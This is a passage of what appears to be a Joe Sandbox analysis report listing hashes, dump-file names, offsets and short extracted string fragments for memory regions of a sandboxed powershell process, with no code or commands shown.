                                          • Instruction ID: 5115a4d270890439e7793a15b64d2c86a539974ff71f2e82f83dd54ef277a589
                                          • Opcode Fuzzy Hash: 4c17294a48f45b304c017c6bfa3d0be33f26839723a5d8844fcf0794334fe124
                                          • Instruction Fuzzy Hash: AD41F974A016099FCB15CF9CC9809ADBBF2FF89310B248659E855E7364C731EC81CBA4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f5b4bcb557372e0c3e1229df059a97576c9881301844bebba5cb22123869593
                                          • Instruction ID: 5367aeeb37c7913f12c04a0bbd6e58fde0ff458fae2e1e2e48186cdb1a3698c2
                                          • Opcode Fuzzy Hash: 3f5b4bcb557372e0c3e1229df059a97576c9881301844bebba5cb22123869593
                                          • Instruction Fuzzy Hash: 5B41E3F1B00201EFEF309E64864976ABBA2EB84650F54C4E5D824DB751D732D945CBA2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2355056807.0000000009610000.00000040.00000800.00020000.00000000.sdmp, Offset: 09610000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_9610000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b41943b71e874cdef46ec92baed5ce8070393438abb36c012f23fdd5be6b6c45
                                          • Instruction ID: 9b0569a8f911213f6dfb1fc06c64b9f8fde2a1c1eb8373da7523711f221409da
                                          • Opcode Fuzzy Hash: b41943b71e874cdef46ec92baed5ce8070393438abb36c012f23fdd5be6b6c45
                                          • Instruction Fuzzy Hash: C2410874A002099FCB05CF9CC984AAEB7F2FF49310F298659E955AB3A4D735EC51CB90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2355056807.0000000009610000.00000040.00000800.00020000.00000000.sdmp, Offset: 09610000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_9610000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53fddee91d150ff8fdb0ac96d97f49f7919e226f0a8cf7e00e5712dd8b77212f
                                          • Instruction ID: 3d8172f0b6db4c9593f28cdab0371c784e7ed14a98a60b655f0d37daf830e8fc
                                          • Opcode Fuzzy Hash: 53fddee91d150ff8fdb0ac96d97f49f7919e226f0a8cf7e00e5712dd8b77212f
                                          • Instruction Fuzzy Hash: F041E875A005099FCB15CF9CC5859AEBBF2FF48324F248658E855A7364C735AC91CB90
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92c82cb094b01b0a7dac173037a1c22b4e57ef2c70cd801ce54954e1ecfb0fea
                                          • Instruction ID: 06b111b7503428f4a2b9f0a62651cda5e41e57074c75b7773dfd5fc0e440980f
                                          • Opcode Fuzzy Hash: 92c82cb094b01b0a7dac173037a1c22b4e57ef2c70cd801ce54954e1ecfb0fea
                                          • Instruction Fuzzy Hash: 4A412878A005059FCB09CF58C594DAAFBB1FF48314B158659C916AB364C736FC91CBA0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c5a16b8a541d212a777f3c99ecb39b1e31203ec47a47a353d206d1b91662f47
                                          • Instruction ID: 5e6dfa1dee1b6a2736af4ee5fe4461b480e366ff93f5eb770757ea1e86db9f2e
                                          • Opcode Fuzzy Hash: 8c5a16b8a541d212a777f3c99ecb39b1e31203ec47a47a353d206d1b91662f47
                                          • Instruction Fuzzy Hash: 592134F130035DABE728597D8950B3AA6D6EBC5702F24887AE519CB381DE76D840C3B0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f38521f30f6078ee863ff69ede9139a53b285204052f2c689a13b4ec95f44124
                                          • Instruction ID: 1eaed2e712fcd5aa35234e9579252962dab8ea8bfc6551b732a68896f2534ab6
                                          • Opcode Fuzzy Hash: f38521f30f6078ee863ff69ede9139a53b285204052f2c689a13b4ec95f44124
                                          • Instruction Fuzzy Hash: D52179F53083C9ABE7201A7989507767BA1DFC2702F2884A6E494DF3D2EA65CD44C371
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344193679.000000000505D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0505D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_505d000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a439e7059d7ae1547554b5fd33f139a54e8e4ab5e060ab25b53f1f161feb964
                                          • Instruction ID: e5ad3af5c082ac3e2f702c9c00c33075048efbd42b6175cdfe0796434629ad30
                                          • Opcode Fuzzy Hash: 5a439e7059d7ae1547554b5fd33f139a54e8e4ab5e060ab25b53f1f161feb964
                                          • Instruction Fuzzy Hash: B921D3B5504201DFDB15DF64E9C0F2BBFA6FB88324F24C5A9EE094A256C33AD416CB61
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8c6b6194136fc333629675d986f751e372efc65e2c0d87cafc5835604124ae7
                                          • Instruction ID: 0ec53692fb29aff13f61967e0c996b9353eda004f498d26e210920880e04abc1
                                          • Opcode Fuzzy Hash: b8c6b6194136fc333629675d986f751e372efc65e2c0d87cafc5835604124ae7
                                          • Instruction Fuzzy Hash: 10212C74A042099FCB04DF98D980DAEFBB5FF89310B1585A9E909EB352C731ED51CBA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344193679.000000000505D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0505D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_505d000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                          • Instruction ID: cc14ec6537ce5403db504b2f11d31d441d616045ead5e9fcccd88e0310bcdd92
                                          • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                          • Instruction Fuzzy Hash: 8521C0B6504240DFDF16CF10D5C4B1ABFB2FB48314F24C5A9DE494A256C33AD45ACBA1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 20ef99ed1e3b2eb89ea027d844f4bdb5f48a80543d0f2f58c80cf060523481f4
                                          • Instruction ID: aa1973007b763d129755f606c6e2441062f9dc197dd4ed8cb580417ab2c60c4c
                                          • Opcode Fuzzy Hash: 20ef99ed1e3b2eb89ea027d844f4bdb5f48a80543d0f2f58c80cf060523481f4
                                          • Instruction Fuzzy Hash: C601DF767041154BDB0A6BB8A8986FF6B96EBC4729F04003EE50E87381CF35590A87E1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344193679.000000000505D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0505D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_505d000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfc3fc1a7bc1f32bee583a691b7fddd89016d35ccf121d5a51c66988a7326d3
                                          • Instruction ID: 7715907718d2553e94c6a11f8b45f66a1752b9371261d8d4d96f5981769a0e7d
                                          • Opcode Fuzzy Hash: 6bfc3fc1a7bc1f32bee583a691b7fddd89016d35ccf121d5a51c66988a7326d3
                                          • Instruction Fuzzy Hash: 2A012B320083049AD7208E19DD84B6FBFDCEF45330F18C46BED490F246C2799942C6B1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1527f7a158a043ca0bfb81e8a3cf6fd79a44dc79e5a6c2226a21fdf0f6ee987e
                                          • Instruction ID: 9bf86298f8db8dc672af9c3c6b544764ffd5296d7ceaac931db3a354ac164cba
                                          • Opcode Fuzzy Hash: 1527f7a158a043ca0bfb81e8a3cf6fd79a44dc79e5a6c2226a21fdf0f6ee987e
                                          • Instruction Fuzzy Hash: 2901FF393552508F8716A73CA46846D7FA7EBCA221319419EE946CB357CF648C03C752
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344193679.000000000505D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0505D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_505d000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e17ebda40623eaf645ad475a2890f531d87d74320804de22c71640264149911
                                          • Instruction ID: 1df1159f9addbcfc3831849c8156b0b1fab36365ef6e134edf7e77b026baec8d
                                          • Opcode Fuzzy Hash: 5e17ebda40623eaf645ad475a2890f531d87d74320804de22c71640264149911
                                          • Instruction Fuzzy Hash: 76015E7240E3C09ED7168B259C94B66BFB4EF53225F1D80DBDD888F293C2699849C772
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c351545e81f7fdbc4d6e66b9a5fc429c2e508353ec05b0dbfeff479309979e77
                                          • Instruction ID: 31d97050cfea5bc40e11bd0f6daedaf64825396f2cd8384fd6324842e8fb0b3b
                                          • Opcode Fuzzy Hash: c351545e81f7fdbc4d6e66b9a5fc429c2e508353ec05b0dbfeff479309979e77
                                          • Instruction Fuzzy Hash: 9BF09036300205CBCF286669A458AAE7BABFBC9260B044A3DD50E87354DFB59C0AC391
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba2131cbb7d016a6aae042061a5e127e919662719a04cb20f288990e297424d0
                                          • Instruction ID: a35eb4a4f4a6cd833e74b36ab380525942c74055d8fd65bc4153b15eb9d46d65
                                          • Opcode Fuzzy Hash: ba2131cbb7d016a6aae042061a5e127e919662719a04cb20f288990e297424d0
                                          • Instruction Fuzzy Hash: A8F01D393115108B86097B6CA02847EBBA7EBC9665314815EE90BC7356CF74DC038795
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9746039113ce32751c09728f6e74299a563dc8a5d860da873dd11641312f7c14
                                          • Instruction ID: 73ca62a1470de14d71e563ce4c7257c030cbd43a71fb2adf4f82471910b97c40
                                          • Opcode Fuzzy Hash: 9746039113ce32751c09728f6e74299a563dc8a5d860da873dd11641312f7c14
                                          • Instruction Fuzzy Hash: E1F0A0323052518BCB16566868589AE7FAAEBCA121705416ED54ECB356CB658C0AC392
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2355056807.0000000009610000.00000040.00000800.00020000.00000000.sdmp, Offset: 09610000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_9610000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e2e91c95dce34fec9131d63bbe971691c336c504ed633bfc9be53bc1872c217
                                          • Instruction ID: 8d34cc671f8203bc68225b058cb739980301df9b8ae38d86cce26bc74e2afb48
                                          • Opcode Fuzzy Hash: 5e2e91c95dce34fec9131d63bbe971691c336c504ed633bfc9be53bc1872c217
                                          • Instruction Fuzzy Hash: 7DF0F971A00109AFCB05DFCCD9808ADFBB6FF88320B648559E554A3260C7329D22DB50
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94db870609fd8a8dcb338832a9ce3f2a7f49125348da0465e2fe7bf9e7278181
                                          • Instruction ID: 07bc069bafe74b29229a6b375b504443b0978db1d72405f0a89fb8e596085d21
                                          • Opcode Fuzzy Hash: 94db870609fd8a8dcb338832a9ce3f2a7f49125348da0465e2fe7bf9e7278181
                                          • Instruction Fuzzy Hash: 11E026353042109BCB0A3B74A48C2EE7A5AEBC8B24F00002DE40E87342CF781901C3D6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b6b7aebe1315b6f245d8df3852800c5c947b4ccdb7806961628fbaec933c14c2
                                          • Instruction ID: 750f242b0ff17296a16c1fe1e8856b689d82acc55157fb4e4738e4d2f2ccf2b0
                                          • Opcode Fuzzy Hash: b6b7aebe1315b6f245d8df3852800c5c947b4ccdb7806961628fbaec933c14c2
                                          • Instruction Fuzzy Hash: EDE0BF3190454ACBCB19EF98E6F94FD7F71FB15201B40419DE50B937A59B30555ACBC0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddc0b3acadf49288c9ed58f3d3de2628c3ca7c03b7be1841eaea26819fd350d4
                                          • Instruction ID: db4e86b23b254123ea8079a60506342396b93d8365ce1f016497b2e3046ef523
                                          • Opcode Fuzzy Hash: ddc0b3acadf49288c9ed58f3d3de2628c3ca7c03b7be1841eaea26819fd350d4
                                          • Instruction Fuzzy Hash: 16E04F34A05204CFCB68EF68E0998AD7FF2EB55210F00415CDA0AD7781CA310802CF81
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 569611d548097426232fa463d04269ecc5c753035fb4e0f527d6664289eccaeb
                                          • Instruction ID: 2b71b82ed2bddfe43a90796c3d815c97828c5449dcfc5fb0117317d9ac641e4b
                                          • Opcode Fuzzy Hash: 569611d548097426232fa463d04269ecc5c753035fb4e0f527d6664289eccaeb
                                          • Instruction Fuzzy Hash: 30D01734E04208CFC768EFA4E48A86EBFB6EB44201F004168DE0A93380DA305801CFC1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344557722.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_51f0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6fa909324533934fe51956238896454cf67f6840a1c89da75d60e1e6380ae27d
                                          • Instruction ID: 9c9a4d734747f0c2ebdaa712c6187b92a67e7734e3eda2bab2e808cefc90aefa
                                          • Opcode Fuzzy Hash: 6fa909324533934fe51956238896454cf67f6840a1c89da75d60e1e6380ae27d
                                          • Instruction Fuzzy Hash: 3ED0673580410ECBCB18EFA4E8AA4BDBB74FA14201F8041ADDA0B93691AF701956CFD1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 877c3f9a94629270aa07bb48b9f1c2592705a787caf0c8987e5305605dc35c27
                                          • Instruction ID: 0986b8e5ae5c4d4132a722e5c4b9d87770d5a08a91b3eaa3e3b8c3d36c28f8e3
                                          • Opcode Fuzzy Hash: 877c3f9a94629270aa07bb48b9f1c2592705a787caf0c8987e5305605dc35c27
                                          • Instruction Fuzzy Hash: AAA011302800008BC200CB88E882800B322AB80308B28C0AEAA088F282CB23E8038A00
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2344193679.000000000505D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0505D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_505d000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b6182d3bb9dd040ecddeef7c15bf600206ad83733a1a9351d15b3cdbbffdf1b
                                          • Instruction ID: 53560765851c01d8c9c69892bc0c5407518a40c762dc04f801f67dcb027c4d4c
                                          • Opcode Fuzzy Hash: 7b6182d3bb9dd040ecddeef7c15bf600206ad83733a1a9351d15b3cdbbffdf1b
                                          • Instruction Fuzzy Hash: 57210672504244DFDB05DF14E9C0F2BBFA6FB88328F24856ADD090B216C336D656CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$XRbq$XRbq$XRbq$tP]q$tP]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q
                                          • API String ID: 0-1562111438
                                          • Opcode ID: 59785980e73c5a450861130a149a7d453b770cb68909004c4846feb49c4a0b0b
                                          • Instruction ID: 7f198147f55472b1b5d3f1d1cdc2b3dd1015a93594af7e266dc26bbe6be4405c
                                          • Opcode Fuzzy Hash: 59785980e73c5a450861130a149a7d453b770cb68909004c4846feb49c4a0b0b
                                          • Instruction Fuzzy Hash: 4402F7F170020ADFEB248F68C5546BA77F2EF85710F5488A5E8219B395CB31DD42CBA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$d5wk$$]q$$]q$$]q$}l$}l
                                          • API String ID: 0-120843172
                                          • Opcode ID: b75006ba3ec28c65de5ea2f4b2ab4f302c128eeec406a03e40c235306d4509dd
                                          • Instruction ID: 05c8f987b71ea217e4a2f1eba3f006b60d9e824185ec71ff1996f8b27b43f6dc
                                          • Opcode Fuzzy Hash: b75006ba3ec28c65de5ea2f4b2ab4f302c128eeec406a03e40c235306d4509dd
                                          • Instruction Fuzzy Hash: 12B158F17043468FEB348A688A5467ABBE6EFC6211F1488FAD865CB351DF31C845C7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$}l$}l
                                          • API String ID: 0-641449571
                                          • Opcode ID: 719d6464e2fab4b9ad2218eec08488843eb37ddbe128d060826e090f0af234a9
                                          • Instruction ID: 819704de03d3591b864186f5eb287c20cccfba12d4bda4e5c77582948ad2c0d0
                                          • Opcode Fuzzy Hash: 719d6464e2fab4b9ad2218eec08488843eb37ddbe128d060826e090f0af234a9
                                          • Instruction Fuzzy Hash: 7CA16BF13043058FE7248A6D891876ABFE6EFC6711F1584FAE865CB351DA31C845C761
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                          • API String ID: 0-1536095838
                                          • Opcode ID: dad39145812c4c0785b81d4c24cdfe36dfd9a78109ae15b14cbb131c253f1482
                                          • Instruction ID: 7259d73336a18aa74aaf04f0e9e45f40435bb744cdeb3de1ec98b8725ee39a60
                                          • Opcode Fuzzy Hash: dad39145812c4c0785b81d4c24cdfe36dfd9a78109ae15b14cbb131c253f1482
                                          • Instruction Fuzzy Hash: C3A117F1B0420ADFEB298F68C4446AAB7B6FF85350F14C8EAD8258B255DB31DC45C7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                          • API String ID: 0-3118609902
                                          • Opcode ID: bdf9bf9e66a7b162d4455e3a47c8bdb1034ca7cdf577203ffd304ead6e25044f
                                          • Instruction ID: a9f2556a1766b7ab5b44ace9f1a815fb2ef77a60c779ac93dd1a2220978a3017
                                          • Opcode Fuzzy Hash: bdf9bf9e66a7b162d4455e3a47c8bdb1034ca7cdf577203ffd304ead6e25044f
                                          • Instruction Fuzzy Hash: BB812AF1700215DFEB258F28C58466ABBE6EFC4710F5485E9E8219B390DB31DD41CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$}l$}l
                                          • API String ID: 0-1802146136
                                          • Opcode ID: 7cdc4f32dea479322a54dece92a6f9d81e3b67e455d0e4985d1aae28352583b4
                                          • Instruction ID: f617d5296bb4d053f1d53a46770f3f07b7ed2ddd89b6a53618646ddc3d945939
                                          • Opcode Fuzzy Hash: 7cdc4f32dea479322a54dece92a6f9d81e3b67e455d0e4985d1aae28352583b4
                                          • Instruction Fuzzy Hash: 036159F17042069FEB29AA6C891067BBBA6EFC2710F1484FBD465CB390DA31C845C7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$tP]q$tP]q$$]q$(cq$(cq$(cq
                                          • API String ID: 0-537408273
                                          • Opcode ID: cc6974e054290739fd4fd1bcb0b22b5658bec97a687c48b2ce85036963d69e0f
                                          • Instruction ID: d31c2b407e84c48e17c8670b7b1d6e1e2062ac80955c967da6c7236985f1cf3d
                                          • Opcode Fuzzy Hash: cc6974e054290739fd4fd1bcb0b22b5658bec97a687c48b2ce85036963d69e0f
                                          • Instruction Fuzzy Hash: A161F5F0600206DFEB24CE59C541B7AB7F2EF84710F6984D9E824AB290C771DD82CB69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$TQbq$TQbq$tP]q$$]q$$]q$$]q
                                          • API String ID: 0-2778409501
                                          • Opcode ID: b1f7537e2b6dc4c1624d1c5ae2307c232b789ff3894ece216b335871d4e97bbc
                                          • Instruction ID: d2c04f7efd8cdec98fb472f453bcc716b7e9ea8e5fbe7a030e9fd1650e8778aa
                                          • Opcode Fuzzy Hash: b1f7537e2b6dc4c1624d1c5ae2307c232b789ff3894ece216b335871d4e97bbc
                                          • Instruction Fuzzy Hash: 1B51FFF0604206DFFB248E18C6447B677E2FF45312F5888EAE8259B691C771DC86CBA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                          • API String ID: 0-1480752206
                                          • Opcode ID: bb750d2c0ad3713dfb09bbc32d65f074d326aaf311104fea76642b79b64dff2e
                                          • Instruction ID: 5c3f1112d7f02bf309b8caf2c94ad2a77df779f80c52384807f6aac9104d29a2
                                          • Opcode Fuzzy Hash: bb750d2c0ad3713dfb09bbc32d65f074d326aaf311104fea76642b79b64dff2e
                                          • Instruction Fuzzy Hash: C97148F1704209DFEB248F28C8156AABBA6EF82351F14C4FAD865CF251DB31C845CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q$4']q$$]q$$]q
                                          • API String ID: 0-2669322367
                                          • Opcode ID: 5b6aabd8c1f1192f2e7f633b5bcc405d9673b29119033ae6f2b3760856b5d1a3
                                          • Instruction ID: 84afc981b128257323749baf0c16800ba88057bea06307523d3a1ce0d7943a47
                                          • Opcode Fuzzy Hash: 5b6aabd8c1f1192f2e7f633b5bcc405d9673b29119033ae6f2b3760856b5d1a3
                                          • Instruction Fuzzy Hash: FE2109F170D3454FD73A263829702A96FE29F8355071A49E7C4A1CB397CE158C09C3A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_7b70000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$tP]q$$]q$$]q$$]q
                                          • API String ID: 0-2702571027
                                          • Opcode ID: 759ce2d7974a813f9fbec214ed9676f2318869291bbf3184214a828f067f5576
                                          • Instruction ID: aa6c5af33558558120182873fda8a2cc12a3dc57a54bf99729da8c31913a5a12
                                          • Opcode Fuzzy Hash: 759ce2d7974a813f9fbec214ed9676f2318869291bbf3184214a828f067f5576
                                          • Instruction Fuzzy Hash: 976190F0A10206EFFB248F58C5447BA77B2EF45311F5884E6E8216B291C771DD82CBA9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2349721516.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
